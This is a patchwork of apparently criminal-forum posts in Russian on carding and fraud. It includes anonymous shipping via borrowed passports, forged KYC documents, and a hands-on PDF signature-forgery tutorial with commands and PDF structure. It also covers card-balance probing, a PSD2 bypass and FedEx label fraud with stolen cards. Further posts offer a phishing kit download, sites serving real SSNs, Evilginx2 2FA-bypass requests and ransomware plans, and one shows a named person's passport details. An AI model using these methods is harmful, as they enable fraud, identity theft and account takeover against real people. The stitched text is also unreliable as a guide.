указать любые данные главное телефон действующий!так как с головного офиса
будет прозвон на подтверждение,блок можно ставить как на телефон так и
письменно его снимать!один минус если получатель груз не заберет,то анонимно и
вы его хер получите....если только с водилой договариваться на доставке!
по факту можно почти с любой ТК отправлять анонимно,но если груз оплачен то
проблем не будет,а если не оплачен то вытаскивать его будет тяжелее!
Заказывай забор груза через сайт деловых линий и пиши туда кого хочешь водитель не смотрит документы!а с квитанцией уже готовой приезжает!
Недавно через сдэк отправлял симки, а на конверте указал -документы.Так вот получателю пришел конверт открытый, с надписью-проверка содержимого! Позвонил в сдэк ,там объяснили:в связи с повышением террористической угрозы грузы досматривают более тщательно.в аэропорту при просвете в конверте с надписью документы ,увидели симки и вскрыли((( Так что при отправке будьте бдительны при указании того что отправляете! Груз можно вернуть даже если он будет уже на терминале получателя...за 15мин времени сменить получателя и все!
СДЭК позвонили недавно,сказали что завтра курьер подьедет подвезет товар.
Сказали чтоб подготовил паспорт,потому что без паспорта он посылочку не
отдаст.
В итоге, приехал курьер и отдал посылку вообще моему соседу. Если посылку
оплачивает получатель то документы не спрашивают.
3. Берёшь алкаша или бомжа с паспортом ведёшь на почту даёшь ему левый телефон и левую симку он привязывает номер чтобы можно было без паспорта получать, отправлять. Ему можете не платить ничего сказав что позовёте когда получать посылку, а получите сами по коду. Так же с постаматом левая сим и левый телефон, приходит код в смс вводим ящик открылся, документы показывать никому не нужно.
Где скачать записи женских голосов для датинг скама, типа "Спасибо, я перезвоню позже", "Я тоже", "Хочу познакомиться" и т.п.
Рисуем теоретическую ситуацию:
Я регистрируюсь на Binance/Bitfinex/Poloniex/etc, иду проходить верификацию. Отрисовываю, распечатываю паспорт на чужие данные, вклеиваю свою фотку и снимаю видео держа в руках этот документ.
Каким образом они определяют что документ действителен, что фото соответствует реальному фото в этом документе, что данный номер паспорта вообще существует и так далее? Как, условно американская/европейская KYC контора проверяет действительность российского, узбекистанского, украинского паспорта/прав/id- card?
Есть ребята которые шарят в этом?
Речь пойдет о редактировании PDF документов и подделке цифровых подписей PDF файлов. О существовании этой уязвимости упоминалось еще в 2012 году, когда PDF соответствовал спецификации ISO 19005-3. Однако после выхода новой версии формата хакеры провели очередное исследование и [привлекли внимание компаний](https://thehackernews.com/2021/02/shadow-attacks-let-attackers- replace.html), разрабатывающих программное обеспечение для работы с PDF. Есть три способа изменить содержимое уже подписанного документа: скрытие , замена , а также скрытие и замена.
Результатом этой атаки будет сокрытие какого‑либо контента за видимым содержимым файла. Как только хакер получает подписанный Алисой документ, он манипулирует документом таким образом, что видимый слой больше не отображается в приложении просмотра. Причем теперь уже ранее невидимые объекты становятся видны в PDF-файле.
Основная идея варианта «Замена» — добавить в подписанный документ новые объекты, которые считаются безвредными, но напрямую влияют на представление содержимого. Например, определение шрифтов напрямую не меняет содержимое. Однако это влияет на вид отображаемого контента и делает возможной замену цифр или символов.
Эта атака нацелена на интерактивные формы. Формы поддерживают различные маски ввода (например, текстовые поля, текстовые области, переключатели и кнопки выбора), где пользователи динамически вводят новое содержимое и сохраняют его в документе. Формы также могут иметь значения по умолчанию, которые при необходимости можно изменить.
Хакер готовит файл, в котором определяется шрифт, и его описание включается в документ. После подписания документа злоумышленники добавляют новое описание шрифта и перезаписывают предыдущее. Поскольку определение новых шрифтов считается безобидным, приложения, проверяющие подпись, не показывают никаких предупреждений о внесенных изменениях.
В варианте атаки «Скрытие и замена» PDF-файл содержит второй скрытый документ с другим содержимым. Так как Алиса не может увидеть скрытое содержимое, она подписывает документ. После подписания хакер получает файл и добавляет только новую таблицу внешних ссылок и трейлер. В таблице внешних ссылок происходит лишь одно изменение: ссылка на описание.
Другими словами, хакер создает файл PDF, содержащий два объекта с одним и тем же идентификатором, но разным содержанием. Поскольку включение таблицы xref, указывающей на уже определенный объект в подписанной области, считается безвредным, никаких предупреждений о внесенных хакером изменениях не поступает, и проверка подписи проходит успешно. Тем не менее Боб и Алиса видят разный контент в одном и том же файле.
Этот вариант атаки наиболее мощный, так как позволяет изменить все содержимое документа. Хакер может создать теневой документ, влияющий на отображение каждой страницы или даже на общее количество страниц, а также на каждый содержащийся в файле объект.
В то же время этот вариант самый «шаткий», так как при подписании могут быть удалены неиспользуемые объекты, в том числе — теневые. Кроме того, сканер безопасности может обнаружить большое количество лишних незадействованных объектов и выдать предупреждение.
Я рассмотрю первый вид атаки «Скрытие» с элементами атаки «Скрытие и замена», так как они по своей сути похожи. Чтобы реализовать атаку, нужно помнить: таблица перекрестных ссылок (cross-reference table) — это обычная текстовая таблица. Она начинается со слова xref и содержит в себе ссылки на все объекты.
![Пример таблицы перекрестных
ссылок](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2F228f341a354313afa1b6171f81bc12ab%2F18584%2F5.PNG&hash=dcfe785e73f57667ab383dd11b2543bf)
Пример таблицы перекрестных ссылок
Цифра 0 на иллюстрации выше обозначает первый номер объекта в таблице, 334 — количество объектов. Первый элемент таблицы всегда имеет вид XXXXXXXXXX 65535 f. 65535 — это число по умолчанию для первого элемента в таблице. F (free) — объект не используется. Напротив используемых объектов стоит n. Далее идет XXXXXXXXXX — это смещение от начала файла до объекта. Таких таблиц в документе будет столько, сколько в файле добавленных объектов.
После таблицы идет trailer, затем значение startxref, указывающее смещение от начала файла до таблицы. Чтение документа программой начинается с конца. Для выполнения атаки нам понадобятся следующие инструменты:
Перед тем как мы начнем потрошить PDF-файл, необходимо получить ключ с сертификатом, которые будут пригодны для КриптоПро. Сгенерировать ключ в OpenSSL не получится. Поэтому запускаем Linux-машину, идем на сайт КриптоПро и скачиваем дистрибутив для своей ОС (у меня он представлен в виде файла .deb). Предварительно надо зарегистрироваться.
![Список файлов в дистрибутиве](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2F228f341a354313afa1b6171f81bc12ab%2F18585%2F6.PNG&hash=105d57db36666e9cbddcaac3aa52801e)
Список файлов в дистрибутиве
Устанавливаем пакет:
Code:Copy to clipboard
./install.sh
Теперь переходим в папку /opt/cprocsp/bin/amd64. Там должны появиться
следующие бинарники: certmgr, cpverify, cryptcp, csptest, csptestf, curl,
der2xer, genkpim, inittst, wipefile.
Генерируем сертификат:
Code:Copy to clipboard
cryptcp -creatcert -provtype 81 -dn "C=RU, L=Rostov-na-Donu, CN=srv, 1.2.643.100.5=305867501589415" -exprt -ex -cont "\\\\.\\HDIMAGE\\srv" -ku -certusage "1.3.6.1.5.5.7.3.1" -hashAlg "1.2.643.7.1.1.2.3" -ca http://www.cryptopro.ru/certsrv
В этой команде используются следующие ключи:
Проверяем созданный контейнер:
Code:Copy to clipboard
./certmgr –list
Должен появиться контейнер как на скриншоте ниже.
![Контейнер в Linux-системе](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2F228f341a354313afa1b6171f81bc12ab%2F18586%2F7.PNG&hash=2218dc64eb4cd091a3ba33283b532858)
Контейнер в Linux-системе
Переходим в папку /var/opt/cprocsp/keys/root
, в которой должна появиться
директория с именем, указанным в команде генерации этого контейнера. В этой
директории ты найдешь шесть файлов с расширением .key
— это и есть
контейнер. Скачиваем и перекидываем его на машину с Windows.
Это еще не все. КриптоПро с ее CSP считает (да и правильно считает, скорее всего), что криптоконтейнер не должен храниться на жестком диске. Для этого были придуманы токены. Но так как под рукой у нас токена нет, а есть только жесткий диск, будем изобретать велосипед. Для этого нам понадобится ImDisk. Скачиваем и устанавливаем его.
Эта программа умеет создавать своего рода закрытое пространство на диске. Да, нам придется соорудить дополнительный виртуальный HDD у себя на компьютере. Я создал раздел размером 60 Мбайт, в нем — папку и вот в нее закинул файлы контейнера. Теперь КриптоПро видит и ключ, и сертификат.
![КриптоПро CSP](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2F228f341a354313afa1b6171f81bc12ab%2F18587%2F8.PNG&hash=db4ebf25769c5ad5fc2131d2bf16ffa4)
КриптоПро CSP
Переходим к подготовке самого файла. Необходимо иметь на машине редактор PDF — я выбрал пробную версию Adobe Acrobat DC, а также КриптоПро PDF для возможности подписать файл.
Открываем Acrobat и создаем пустой файл. Пишем посередине ][aker. Сохраняем и закрываем его. Примерно так выглядят внутренности пустого файла с одним словом, которое мы ввели:
Code:Copy to clipboard
%PDF-1.3
3 0 obj
<</Type /Page
/Parent 1 0 R
/Resources 2 0 R
/Contents 4 0 R>>
endobj
4 0 obj
<</Filter /FlateDecode /Length 86>>
stream
xњ3Rрв2Р35W(зr
QРw3T02С30PISp
кZ*›лY)„¤(hg¦з)д¦*”д+¤§–($*Ґ–'Ґиi*„dЃф ьM
endstream
endobj
1 0 obj
<</Type /Pages
/Kids [3 0 R ]
/Count 1
/MediaBox [0 0 595.28 841.89]
>>
endobj
5 0 obj
<</Type /Font
/BaseFont /Helvetica-Bold
/Subtype /Type1
/Encoding /WinAnsiEncoding
>>
endobj
2 0 obj
<<
/ProcSet [/PDF /Text /ImageB /ImageC /ImageI]
/Font <<
/F1 5 0 R
>>
/XObject <<
>>
>>
endobj
6 0 obj
<<
/Producer (PyFPDF 1.7.2 http://pyfpdf.googlecode.com/)
/CreationDate (D:20201116165607)
>>
endobj
7 0 obj
<<
/Type /Catalog
/Pages 1 0 R
/OpenAction [3 0 R /FitH null]
/PageLayout /OneColumn
>>
endobj
xref
0 8
0000000000 65535 f
0000000242 00000 n
0000000430 00000 n
0000000009 00000 n
0000000087 00000 n
0000000329 00000 n
0000000534 00000 n
0000000643 00000 n
trailer
<<
/Size 8
/Root 7 0 R
/Info 6 0 R
>>
startxref
746
%%EOF
Теперь вставляем картинку поверх надписи, настраиваем нашу подпись и подписываем документ. Открываем его в Notepad++ и находим xref с таблицей для нашей картинки. Меняем необходимые значения n на f, делая их скрытыми.
![Замена таблицы на скрытие
объекта](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2F228f341a354313afa1b6171f81bc12ab%2F18589%2F10.PNG&hash=46b167278cda15c4462aef5e1721cb83)
Замена таблицы на скрытие объекта
Сразу скажу, что можно также спрятать картинку, обозначив ее как метаданные. Их обновление программа не будет считать вмешательством в содержимое документа. Синтаксис метаданных PDF (старого образца, но он работает до сих пор, значит, версионность форматов поддерживается) можно изучить, к примеру, тут. Загружаем файл, меняем метаданные и видим их в разобранном виде. Далее методом проб и ошибок пытаемся подкинуть измененные данные в файл. Должно получиться примерно следующее:
Code:Copy to clipboard
stream
<?xpacket begin="п»ї" id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.4-c006 80.159825, 2016/09/16-03:31:08 ">
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about=""
xmlns:xmp="http://ns.adobe.com/xap/1.0/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/">
<xmp:ModifyDate>2019-08-07T13:48:36+02:00</xmp:ModifyDate>
<xmp:MetadataDate>2019-08-07T13:48:36+02:00</xmp:MetadataDate>
<xmp:CreateDate>2019-08-07T11:14:22+02:00</xmp:CreateDate>
<dc:format>application/pdf</dc:format>
<xmpMM:DocumentID>uuid:d24ecc88-2a52-0b43-9272-3abe5e065c85</xmpMM:DocumentID>
<xmpMM:InstanceID>uuid:9d3cd24f-99fe-0849-a303-c9cfac889c31</xmpMM:InstanceID>
</rdf:Description>
</rdf:RDF>
</x:xmpmeta>
<?xpacket end="w"?>
endstream
Итак, мы подписали файл с фото, а при открытии документа видим абсолютно другой контент.
Баг отработает не везде. Adobe исправила ошибки CVE-2020-9592 и CVE-2020-9596 в обновлении, выпущенном 12 мая 2020 года. Программа Foxit Reader тоже выдает предупреждение о безопасности при попытке открыть измененный документ с цифровой подписью. Более старые версии, к примеру Adobe Acrobat Reader DC v 2019.021.20061, Foxit Reader 3.4.0.1012 и LibreOffice Draw до 6-й версии, уязвимы для такого рода атак. Что касается просмотра PDF через браузер , то ни один браузер не проверяет подпись в документе, для уязвимость будет работать еще долго.
По материалам статьи 8bit
Ребят, ищу челика кто только встал на путь кардинга желательно того кто начинает воркать по логам
Этот сайт не единственный, но мы будем рассматривать именно на его примере.
У многих бывала ситуация, что недостаточно суммы на сс для покупки.
Так вот, сейчас мы попробуем узнать, хватит ли на карте суммы для покупки не
делая звонков в банк, не имея роллки и тд и тп за пару минут.
При этом предавторизация на карту не вешается и она не убивается!
Делаем под чистым IP USA:
1. Имеете валидную СС;
2. Переходите на этот сайт
3. Например, мы вбиваем в шоп на 979$, значит набираете корзину примерно на
эту сумму +-
**4. Заполняем билл=шип с вашей сс;
**5. Заполняем сс, exp, cvv;
**6. Если получаем такое окно при следующем шаге - значит на сс недостаточно
средств;
7. Немного убавляем наши аппетиты, и если получаем такое окно - то данная
сумма на карте есть;
" Далее" не жмем!
_8. Идем обратно в шоп, куда хотели вбивать и заканчиваем начатое.
Вы великолепны
P.S. В чем суть проделанных нами действий? Например, вы вбиваете сс, делаете
ордер на 650$ - деклайн. Вы уверены, что карта жива, система настроена и следы
подчищены.
Через вышеописанный способ пробуете немного опустить планку, и к примеру
"купить" товар на 450$ и так, пока не увидите желанное сообщение.
Возвращаемся в наш шоп, где изначально хотели сделать покупку за 650$ - чуть
редактируете корзину до 450$, вбиваете, радуетесь жизни.
Ещё через personalcapital.com_******
Если открыть оригинальным acrobate pdf то подхватит вирус? а если какую нить
читалку pdf то клин?
и еще. на ios может занестись вирус через pdf? и как защититься
https://aliexpress.ru/wholesale?tra...olesale&SortType=price_asc&groupsort=1&page=1
https://aliexpress.ru/wholesale?tra...olesale&SortType=price_asc&groupsort=1&page=1
https://www.ebay.com/sch/i.html?_from=R40&_nkw=usrp+n210&_sacat=0&_sop=15
https://www.ebay.com/sch/i.html?_fr...TitleDesc=0&_sop=15&_osacat=0&_odkw=usrp+n210
Через admitad.сom регистрируем 2 акка с разных ip, железа как вебмастер можете по реф ссылке которую создадите с первого акка. Берёте любую группу с вк, телеграмм и пытаетесь привязать как свою площадку подаёте запрос на добавление тип вы веб мастер(они даже не проверяют кто реальный владелец), если такая привязана, то другую ищите. Подаёте запрос на сотрудничество тинькофф и остальные банки после одобрения по ссылкам заказываете карты, открытие счёта, кредиты, ипотеку, т.п. и вам падают абсолютно белые деньги типо вы продвигаете продукт и по вашей ссылке получают карты))) Если отказ от сотрудничества подключается другую чужую группу(делается просто разберётесь) через тикет отправляете повторно заявку. Платят за них нормально. Тоже самое с микрозаймами там офферы есть например е-капуста, приполучение займа через ссылку с admitad.com дают бонусы только заранее подключайтесь к партнёрке. можете подключиться к aliexpress, eBay, dhgate.com и т.д. и заказывать сами у себя через свои рефералкиС алика можно 2 купона одновременно использовать один от продавца и один от алика,. На алике можно оформить заказ, но не оплачивать отписать продавцу чтобы цену скинул на заказ и цена изменится
https://www.paypal.com/us/webapps/mp...-card- services переходишь по этой ссылке,дальше нужно выбрать apply now из одной из карт,логинишься
Обход ПСД2
Переходим на Donatieknop логинимся , ищем developer - переходим , там ищем
PayPal.com - ты вошёл
Обход ПСД2
Берем акк и идем логиниться, ловим ПСД2.
Дальше идем по Donatieknop
и не сразу логинимся а чуть лазим по сайту, кликаем и переходим в девелопер.
Там тоже кликаем, собираем куки несколько минут, обратно идем по ссылке и уже
логинимся. После этого вас запускает в аккаунт без ПСД2 проверки.
Лейбл это накладная, допустим пришел вам товар вы хотите его переслать себе,
для этого и нужна накладная. Вот решил узнать как их делать, своими трудами я
все таки смог.
МАНУАЛ ПО ЛЕЙБЛАМ FEDEX!
Для начала, как и в любом деле — настраиваем систему, подбираем чистый туннель
/ сокс и уже под него ищём мат (после выбора валид материала — регистрируем
почту под КХ). Затем переходим на fedex и выбираем «United States».
Для начала, как и в любом деле — настраиваем систему, подбираем чистый туннель
/ сокс и уже под него ищём мат (после выбора валид материала — регистрируем
почту под КХ). Затем переходим на fedex и выбираем «United States».
Теперь регистрируем аккаунт и получаем скидки на лейблы:
Скидка 40% на услуги FedEx Express® США, международные и обратные отправки.
Скидка 10% на услуги FedEx Express® США и международные грузовые перевозки.
Скидка 20% на соответствующие услуги FedEx Ground®, теперь включая услуги наземного возврата.
Скидка 10% на соответствующие услуги FedEx International Ground®.
Скидка 60% на соответствующие услуги FedEx Freight® Priority и FedEx Freight®
Economy для услуг с меньшим количеством грузовых перевозок в пределах США, а
также в Канаду и из Канады.
Нас отправит на страницу с соглашением сервиса и после чего предложит выбрать
нам войти в аккаунт как уже существующий пользователь или создать новый —
создаём новый.
Вводим billing данные КХ с карты, которую вы купили и выбираем в самом низу
«Create a user Id only».
После нажимаем на кнопку «ship now» и переходим к следующему этапу.
Выбираем последний пункт с оплатой кредитной картой и жмём «continue».
Нас направит на страницу с подтверждением регистрации, после чего нажимаем на
кнопку «start using Credit Card Shipping».
Вводим данные для отправки (откуда и куда поедет посылка), выбираем «Fedex One
Rate» и выбираем упаковку, которую предложит Fedex или свою.
Теперь вводим данные с приобретенной нами карты.
Если оплата проходит — вы получаете ваш лейбл и остаётся только по нему отправить посылку на отделение.
Всем привет! Кого не затруднит разьясните немного по моим вопросам, заранее благодарен всем за помощь!
а) Какая ОС будет лучше для новичка в этом нелегком деле(из соображений Безопастность/Комфорт) Window 10(на что именно стоит обратить внимание при выборе образа) или Linux(Kodachi например, не супер уверенный пользователь Linux, но если намного лучше и актуальнее чем Винда то смогу разобраться потихоньку), установка соответственно на сьемный носитель 64gb+ чем выше скорость тем лучше. Оставляет ли какой либо след мой HDD/SSD/M2 при работе с флешки на винде? В Kodachi вроде как они по дефолту выключены
б) Какой перечень софта необходимо иметь на 2-ой флешке(а может даже и на основной с ОС) для работы: Proxifier, Bitvise SSH(Или при использовании той же Сферы(бесплатной для начала) в этом софте нет необходимости?), Jabber, Антик(Сфера,Indigo(чья платная версия сейчас более актуальна под наши задачи(залив))?,Tor, VirtualBox, Железный антик by Vektor T13(Нужен ли он вообще? или связки VPN + виртуалка + носок/туннель или VPN + дедик будет вполне достаточно?), VPN client(какой актуален? если ли смысл поднимать свой на VPS или на старте это излишки?) Что из софта забыл или что лишнее?
в) У меня комп подключен через WiFi в роутеру(без lan шнура) можно ли просто загружать рабочую ОС с флешки и работать по вышеописанной цепи(VPN + виртуалка
г) Какая схема оборота денег будет правильной(для покупки СС и другого необходимого материала Прокси,Дедики и тд. для вывода средств и ввода в крипту) Будет ли достаточно саморега qiwi с которого закидывать в крипту(монеро как вариант), не слишком ли примитивна цепь Своя Банковская карта - QIWI(левый) - Крипта , и для вывода соответственно так же в обратную сторону, какие есть варианты? (обязательны ли миксеры, от какких сумм они становятся актуальными?)
д) Как выглядит цепь работы с дропами и посредами? Я вбиваю в US на посреда типа бандеролька(ее не смутит что чел из us отсылает в Россию посредом?) Или мне необходимо сначала что бы дроп забрал товар и потом отправил через посреда?(или он сам может выслать курьерской службой?) Как быть с растаможкой(платить с левой карты или?) Что если попросят ИНН?(делать отрисовку или скан на левое имя со своим фейсом?) В России товар принимает так же дроп и потом отправляет курьеркой мне? в этом пункте поподробнее если не затруднит, вопросов много)
Пока вроде как все, но я думаю как коснется практики, вопросы еще появяться)
](https://anonfiles.com/pbQ5zf9bo6/33_PHISHING_SITES_rar#!/WeX01bB9ADViYlP7)
anonfiles.com
В данный пак входят сайты :
adobe
badoo
create
cryptocurency
devianart
dropbox
facebook
github
gitlab
google
instafollovers
instagram
linkedin
messenger
microsoft
myspace
netflix
origin
paypall
pintest
protonmail
shopify
shopping
snapchat
spotify
steam
twich
twitter
verizon
vk
wordpress
yahoo
yandex
https://generatormr.com/full-info#work-box
Вы можете бесплатно сгенерировать реальные Full Info(рандом штат)
Пример:
(ALESIA SWANK APT AK-6 120 ELM ST EDGEWATER PARK NJ 8010 158-84-8869 3/1/1988)
База данных 2017-2018 год
Сгенерировать МРЗ код/Персональный номер для паспорта США и других документов.
Получить инструкцию по Баркодам и их содержимому в Водительских удостоверениях USA/
Отдельно можно получить бесплатно FULL INFO в телеграмм боте
https://web.telegram.org/#/im?p=@generatormrfullinfobot
https://generatormr.com/full-info#work-box
You can generate real Full Info (random) for free)
Example:
(ALESIA SWANK APT AK-6 120 ELM STREET EDGEWATER PARK NJ 8010 158-84-8869 3/1/1988)
Database 2017-2018 year
To generate SSE code/Personal number for the US passport and other documents.
Get instructions on Barcodes and their contents in the USA Driver's licenses/
You can also get FULL INFO for free in the telegram bot
https://web.telegram.org/#/im?p=@generatormrfullinfobot
Генерирует фулл и ссн! Реальные фулки, из базы какой-то дергает. чекал лично руками, все валидные, бывает из-за того что такая фулка уже есть и она в лимите! Если собираетесь использовать их, то пробивайте бг, чтобы получить более точную инфу!
Доброго времени суток, стоит такой вопрос как определить по ip какой компании он принадлежит?
Если кто занимается картингом электроники (смартфоны, планшеты, наушники,
приставки и т.д) напишите.
Кто-то сам занимается или есть сайт с уже купленным товаром и продает за
20-40% от реальности суммы электроники , очень интересная тема.
Покупка услуги, базы данных или сайта только через гаранта!
Приветствую, подскажите пожалуйста селлеров либо шопы с банками еу с доступом в онлайн. Заранее спасибо.
Всем привет, интересует рабочее решение по почте гмаил с обходом 2фа
особенно интересвует скам на основе mitm proxy evilginx2 или modlishka
кто в теме тот поймет =)
эти решения очень удобные и прекрасно работали у меня до недавнего времени,
пока насколько я понимаю гугл не стал проверять,
где выполняется его яваскрипт для авторизации в гугле
и блокировать если адрес не совпадает с официальным сайтом
поправьте если я не прав
если есть у кого работающие решения на основе Evilginx2 Modlishka
пишите, готов хорошо заплатить за помощь или можем сотрудничать!
контакты w0rkx@jabber.cz
На нашем сайте https://generatormr.com/full-info#work-box
Вы можете бесплатно сгенерировать реальные Full Info(рандом штат)
Пример:
(ALESIA SWANK APT AK-6 120 ELM ST EDGEWATER PARK NJ 8010 158-84-8869 3/1/1988)
База данных 2017-2018 год
Сгенерировать МРЗ код/Персональный номер для паспорта США и других документов.
Получить инструкцию по Баркодам и их содержимому в Водительских удостоверениях USA/
Отдельно можно получить бесплатно FULL INFO в телеграмм боте
Access your Telegram messages from any mobile or desktop device.
web.telegram.org
On our website https://generatormr.com/full-info#work-box
You can generate real Full Info (random) for free)
Example:
(ALESIA SWANK APT AK-6 120 ELM STREET EDGEWATER PARK NJ 8010 158-84-8869 3/1/1988)
Database 2017-2018 year
To generate SSE code/Personal number for the US passport and other documents.
Get instructions on Barcodes and their contents in the USA Driver's licenses/
You can also get FULL INFO for free in the telegram bot
Access your Telegram messages from any mobile or desktop device.
web.telegram.org
Расскажите пожалуйста, кто шарит за скам на алиекспресс?
Много вижу на форумах про данный вид скама, но никто не может объяснить в чем
заключаеться схема
Выкладываю интересный пример проведенной почти успешной СИ & фишинг атаки на криптовалютную биржу Codex.one. Способ древний, EmPyre'у года 3, не меньше. Но как видим, способ успешно работает по сей день. Главное - качественный СИ. И в данном примере СИ хромал.
Основатель криптовалютной биржи Codex и CEO Attic Lab Сергей Васильчук едва не стал жертвой фишинговой атаки, которую злоумышленники пытались провести под видом сотрудника редакции ForkLog.
8 августа Сергей Васильчук получил в Telegram сообщение от пользователя с ником Vlad Artemov, представившегося сотрудником редакции ForkLog (здесь и далее орфография и пунктуация авторская):
Добрый вечер, Сергей! Меня зовут Влад Артемов и я представляю интересы компании ForkLog. Ваши контакты мне были любезно предоставлены Вашим саппортом. Мы бы хотели разместить пост с обзором вашего сайта на нашем новостном ресурсе. ForkLog — самое крупное русскоязычное интернет-издание о криптовалютах и блокчейне, что гарантирует успех нашим клиентам. Хотелось бы обсудить с Вами детали нашей статьи — я с радостью отвечу на все Ваши вопросы в любое удобное для Вас время. С Уважением, Артем, команда ForkLog
Click to expand...
Обратите внимание, что злоумышленник в одном письме представился сразу двумя именами.
Однако, по словам Васильчука, он не придал особого значения этому сообщению, так как в этот момент маркетинговый отдел его компании действительно взаимодействовал с ForkLog по ряду публикаций. В конечном итоге он ответил «нашему сотруднику»:
Влад приветствую, я знаю Forklog с тех пор когда Каплан еще сам был. У нас есть группа , в которой человек 5 из Форклога и там же наш CMО
Click to expand...
Спустя сутки, 9 августа, Влад-Артем прислал ответное сообщение:
Добрый вечер, Сергей! Мы все обсудили с Александром. Я отправлю Вам ссылку на онлайн просмотр статьи о Вашей компании по готовности. Благодарю Вас за сотрудничество.
Click to expand...
13 августа он написал следующее:
Здравствуйте, Сергей! Напишите, пожалуйста, когда вы будете за компьютером, чтобы Вам было удобно принять ссылку на онлайн просмотр. Я смогу отправить сегодня в любое, удобное для Вас время.
Click to expand...
Васильчук продолжил игнорировать сообщения от Влада-Артема, ожидая, когда CMO Codex даст ему отмашку, однако «новичок» не сдался и 16 августа начал давить на жалость и перешел в активную стадию атаки:
Сергей, мне была поставлена задача получить именно Ваше одобрение. После того, как Вы просмотрите, я смогу отправить и Александру. Возможно так проверяют стажера — на выполение поставленного задания. Я надеюсь на Ваше понимание.
Вот ссылка на онлайн просмотр: https://forklo*s.com И вот Ваш id для просмотра: 1703fc35dd531259e71f99aa4caa595c777b3261Click to expand...
Решающий момент
«В это время я находился в ожидании рейса, решил посмотреть, что там «бедняга»
сочинил, размышляя о странностях кадровой политики ForkLog. Открываю ссылку,
вижу какую-то странную страницу с предложением «ввести хеш для расшифровки
документа»… Ввожу, и тут браузер начинает запрашивать у меня не совсем
характерные операции.
Тут мое терпение заканчивается, решаю высказать свое негодование ForkLog, что приводит меня в чувство, я заново анализирую всю историю от начала до конца и понимаю, что такое поведение нетипично для редакции, которую я знаю с самых истоков. Спрашиваю у настоящего ForkLog о необычном стажере, и ответ ставит все на свои места. Быстро отключаю ноутбук от интернета, закрываю браузер и сообщаю о произошедшем ответственным за безопасность биржи Codex. В течение считанных минут информация доносится до бирж Kuna и Hacken, которые также незамедлительно принялись за анализ инцидента, за что выражаю им огромную благодарность».
Технические подробности атаки
Скрипт эксплуатирует developer friendly подход MacOS и невнимательность жертвы. Под видом расшифровки документа он устанавливает бэкдор в системные службы операционной системы и ждет команд с удаленного сервера.
«Наш специалист по безопасности исследовал этого трояна и я пришел в ужас от его потенциальных возможностей — злоумышленник получал полный контроль над машиной, включая управления такими системными службами, как KeyChain… Другими словами — получал доступ к паролям и даже сертификатам, не говоря о файловой системе, почте и мессенджерах» , — отметил Васильчук.
Click to expand...
Внутреннее расследование показало, что для атаки использовалось ранее известное решение EmPyre с открытым исходным кодом. EmPyre — клиент-серверная платформа, написанная на Python и позволяющая (в данном случае с помощью AppleScript) установить в систему агент-имплант.
Весь процесс атаки можно описать следующим образом:
Среди «предопределенных» команд можно выделить следующие:
Платформа также позволяет атакующей стороне реализовать и свой набор модулей, предоставляя для этого API.
Примечательно также то, что все общение клиент-сервер происходит в зашифрованном (AES) виде на уровне отправляемых пакетов. Также каждое сообщение имеет HMAC-подпись.
Агент имеет в своей реализации режим работы «только в рабочие часы», а также функцию самоуничтожения, которая может быть задана как датой заранее, так и командой с управляющего сервера.
Имплант в системе может быть обнаружен присутствием файла ~/.Trash/.mac- debug-data(по умолчанию).
«Признаюсь честно, меня эта ситуация испугала, — говорит Сергей Васильчук. — Я осознал, насколько недооценивал угрозу социального инжиниринга, и понял, насколько уязвимы внешне «неприступные» современные IT-системы. Я не стал жертвой, так как вовремя среагировал, но наживку все-таки проглотил».
Click to expand...
Скрипты:
Sberbank
SpinMoney
XBet
Фишинг Вк
Фишинг Стим
Скрипт Boxberry+Avito+бот в телеграмме + платежка
Скрипт антикино, боулинг, отель.
Скрипт полуавтоматического обменника
Скрипт Ebabki
Скрипт сайта по продаже услуг взлома жопы
Скрипт 85 Фейков популярных страниц
Скрипт Казино
Скрипт системы активной рекламы EX PROMO
Скачать:
You must have at least 1 reaction(s) to view the content.
Hi Guys im using at the moment new.gatesms.net for my sms phishing. But the gateway dont working. is there any one that also working with this gateway ? can you pm me then . And if someone els knows a other gateway can you pls send me pm Thank you i ready .
Привет бандиты, подскажите как правильно поступить есть доступ к фирме которая
видеть бухгалтерию других фирм у них постоянно идет оборот денег, что лучше
сделать выкачать базы их поставить локер?
Доступ есть к БД к сайту к почте и вообще доступ к пк через хвнц
Дисклеймер:
Эта статья не про то как заработать быстро денег, про хитрую схему, написание
стилера или новый метод обхода политик безопасности. Это немного о другом, не
про схему, а про платформу. С примерами кода и в то же время, не оторвано от
реальности и применимо на практике с пользой. Много второстепенного кода
сознательно упущено, чтобы не отвлекать внимание от сути. Давай вместе поймем
насколько это все может быть практично и какие возможности открывает?
Нынче модно стало контролировать население через биометрию. Загрузи паспорт, покажи лицо, сетчатка глаза, отпечаток, паспорт, мазок... Понятно, это для контроля и управления людьми государствами или корпорациями. И конечно - повышенная безопасность пользователей(какая забота)!
Что же делать, тут быть?
Создаем свой личный, маленький, теневой, электронный концлагер! Конечно же, с благими намерениями.
Нам нужен pytesseract для распознавания текста. Это либа для распознавания текста с графических изображений. Казалось бы, вот оно, решение, загнал пикчи, распознал, но есть ньансы...
Python:Copy to clipboard
import pytesseract
from os import walk
from PIL import Image
Проходимся по папке с доками и загоняем каждый файл в tesseract:
Python:Copy to clipboard
lang = 'eng'
text += pytesseract.image_to_string(page, lang=lang) + "\n"
Получилось интересно, можно поиграться с языками и добиться большей эффективности.
Spoiler: Результат распознавания
samples2/asdasdasfqfqweqwe.jpg
i VKPATHA @ UKRAINE W
Tun/ Type Koa nepxasu/ Country code Homep nacnoprta/ Passport N No. suas
nAcnoPpT P UKR FM522644
PASSPORT _ "Ipissuue/ Surname
KPVBOB'A3/KRYVOVIAZ
Im's/ Given Names
NABIO/PAVLO
Tpomagsucrso/ Nationality
YKPAIHA/UKRAINE
Ajata Hapogpxerus/ Date of birth 3anuc N2/ Record No,
29 [PY/DEC 82 19821229-05395
